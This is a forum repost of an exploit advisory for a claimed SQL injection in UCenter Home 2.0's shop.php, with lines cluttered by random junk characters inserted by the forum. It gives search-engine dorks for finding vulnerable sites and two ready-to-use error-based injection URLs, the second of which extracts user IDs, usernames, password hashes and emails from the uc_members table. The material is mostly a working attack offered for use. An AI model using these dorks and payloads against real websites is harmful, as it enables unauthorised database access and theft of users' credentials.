中国网络渗透测试联盟

标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability [打印本页]
作者: admin    时间: 2013-2-27 21:31
标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

$ a1 l" \4 Z  T9 ]! t6 J__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
0 l9 _: ~$ {/ ?" F+ V
: M2 y+ _* T' ~- L" S                                   P" s6 |: P2 z% @8 a+ d, x

3 K4 \' H- u5 Z8 M4 I) V*/ Author : KnocKout  
+ e# |! O# C8 N/ ~8 X: b6 X
4 y: s/ ~6 @$ K8 H3 F+ q& V0 Y*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  1 V( ~7 s" m5 A4 T( b. `) H

* J7 N) w8 w3 ]*/ Contact: knockoutr@msn.com  
7 R, `7 P1 ?! j( M% y6 I* }( w5 M9 J+ h+ n) s0 m% ?2 u/ A& c4 @& J
*/ Cyber-Warrior.org/CWKnocKout  
9 A: b" S3 Z3 C& ^# r5 d
9 b4 u: }2 E# N2 a3 o' |% Y__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  4 m, X2 b- W, N0 X: X8 d

2 V6 F0 g: p2 }' f1 O) KScript : UCenter Home  
! L  R/ g5 |) b  g' @
+ r! V3 o6 X  i- F& \# N( `Version : 2.0  
7 e9 Z2 E% e! Z
, _5 s3 W7 p3 c6 d8 yScript HomePage : http://u.discuz.net/  : m: F" _# q; b0 v6 I5 S( o: f
& h* v. D& j! ^( ^2 z3 D# G6 |
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
) b( m0 t9 \! K7 z( L& l" v/ S' L$ p+ l) Q# H# n7 Y2 i3 E
Dork : Powered by UCenter inurl:shop.php?ac=view  + Z( Z  `/ \) c+ z
  s  Z; j( ^6 R
Dork 2 : inurl:shop.php?ac=view&shopid=  4 e! G- G, f/ i

4 j4 ~  J5 k: u# E! P2 C2 l) N__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
6 G6 m& G# S, d
" C  S1 v0 Z" H+ K0 J. r& e: \Vuln file : Shop.php  2 D# ^6 h- H  t: F$ t
: C# k; x) }: n4 e
value's : (?)ac=view&shopid=  
+ A9 S" j' c3 M
; A- t! B8 O  o; G' J0 ^$ T# R( [Vulnerable Style : SQL Injection (MySQL Error Based)  
8 @; }0 c3 m0 h7 ?$ C' O% B) q: k  D8 L! z
Need Metarials : Hex Conversion  : D7 o9 W; q: U% b

3 S2 O# V0 p0 E1 P__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  / q1 C' \3 ?5 N/ |
; w) a4 s& `. t# _% C
Your Need victim Database name.   
3 h& z4 m1 C% x3 x$ K+ D
- A) U- W; a- J' r4 Q$ T7 Vfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  # _+ c  Z/ V* U* o8 h
! E$ _2 p: Q& r+ n) w& u# b/ s
..  3 t5 g0 I8 w* B0 [9 l$ `3 U! H

! X  K  I4 y- V. L/ yDB : Okey.  5 o  {  H( M6 q( P- _
/ b% h2 \. d8 h+ e' b
your edit DB `[TARGET DB NAME]`  2 [. ~* O2 M' k% L* D2 F

( c/ n3 Q) J! a0 z2 b/ L) _Example : 'hiwir1_ucenter'  2 c  y3 {# z3 N' j0 x. F8 k, J! y2 U  o

. k; B, s. V. C2 _4 d* nEdit : Okey.  
0 `& j' b" `& O9 h
9 n# y5 W  Z9 w4 ]Your use Hex conversion. And edit Your SQL Injection Exploit..  
1 f; U2 D# y! S# C  a) Z' h4 F$ p- Z  e8 v
     m" ~( S6 W& C& p& E
) x  w8 \1 o3 v# _3 u
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
3 x$ w, ~5 g! H- d( U- L2 d



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2